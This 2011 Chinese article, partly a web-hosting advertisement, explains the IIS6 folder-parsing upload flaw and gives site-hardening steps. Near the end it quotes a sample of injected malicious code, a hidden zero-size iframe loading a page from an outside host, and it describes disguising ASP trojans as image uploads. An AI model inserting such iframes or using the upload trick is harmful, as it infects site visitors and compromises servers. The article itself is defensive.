如何防止网页病毒和木马?
日期:2011-02-17 阅读:2450
在Google中搜索:因系统层出不穷的上传漏洞、注入漏洞、Win2003本身的设计缺陷,导致目前国内大多数的中小网站都存在或多或少的安全问题。加之很多网站管理员的安全水平有限,目前网页病毒木马非常猖獗。作为一家中小企业有必要搭建起一个管理企业网络的技术服务平台,以适应企业实现与国际竞争接轨、实现网络化和信息化的要求。当然,这也是日渐激烈的市场竞争,对中小企业“网管”的时代要求。
Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.asp的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。因为微软尚未发布这个漏洞的补丁,所以几乎所有网站都会存在这个漏洞。经测试,这个问题不限于asp,甚至php, CGI等都存在这种问题。
目前国内大部分的网站都是运行在IIS6下,如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等结尾,那么放在这些文件夹下面的任何类型的文件都有可能被认为是脚本文件而交给脚本解析器而执行,如果黑客将一个 hack.asp 文件改名为 hack.gif 上传到这些目录中,那么不堪设想。据悉,http://www.gz1024.com 利用其技术优势,推出10重安全保障的虚拟主机。
一,Stream开关可自由设置,ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。 Fso开关也可自由设置,FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。
二,假设网站建设好后,今后一段时间都不会再用到ftp上传功能,这时可以暂时关闭FTP上传,有助于提高网站的安全,即使ftp密码泄露,黑客也不能操作空间内的文件,设置后60秒后生效。
三,另外还可设置脚本权限与写入权限,如果网站只使用了asp,可设置为只开放asp权限。这样黑客即使上传了php的木马到空间也不能运行,最少的权限=最大的安全。写入权限设置则系统支持全国领先的目录权限设置,允许关闭网站的写入权限,锁定虚拟主机。对安全有重要意义,例如可以将access数据库放在databases目录,而将wwwroot目录的写入 权限关闭,令asp木马根本无法上传,这样比关闭FSO更安全。
多重安全保障解决漏洞问题
是否经常有人到论坛发些广告信息而感到烦恼?这时,它的作用产生了,可以明确拒绝或授权某些IP地址对网站的访问。对某些重要的子目录,如论坛的后台管理目录/admin/可以设置为所有人拒绝访问,只允许自己的ip访问.这样即使黑客知道了论坛的超级管理密码,也无法对论坛进行管理和破坏。重要文件还可设置保护,当文件被保护之后,该文件将无法从web访问。可以使用该功能来保护重要文件的安全性,比如ACCESS数据库等。
是否担心被黑客攻击网站导致瘫痪?通常用户网站被黑(如网页被篡改,文件被盗,被删等)都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。所以在无法确认系统是否存在上传漏洞的情况下,只要保证文件上传目录没有脚本运行权限,那么即便黑客将木马上传到空间也无法运行,这样就无法危及网站。
如果网站存在上传漏洞或注入漏洞,很容易被黑客上传木马,添加病毒代码。查看网页源代码,会发现病毒代码一般是:<iframe src=http://www.hao234gs.cn/m.htm width=0 height=0></iframe>等,而黑客通常会在网站里面留下后门程序,如海洋顶端asp木马,以便日后再次侵入网站。使用“病毒查杀”功能,可以批量清除木马代码,省去了先下载,再手工删除,再上传的麻烦,并且将这些病毒木马一网打尽。'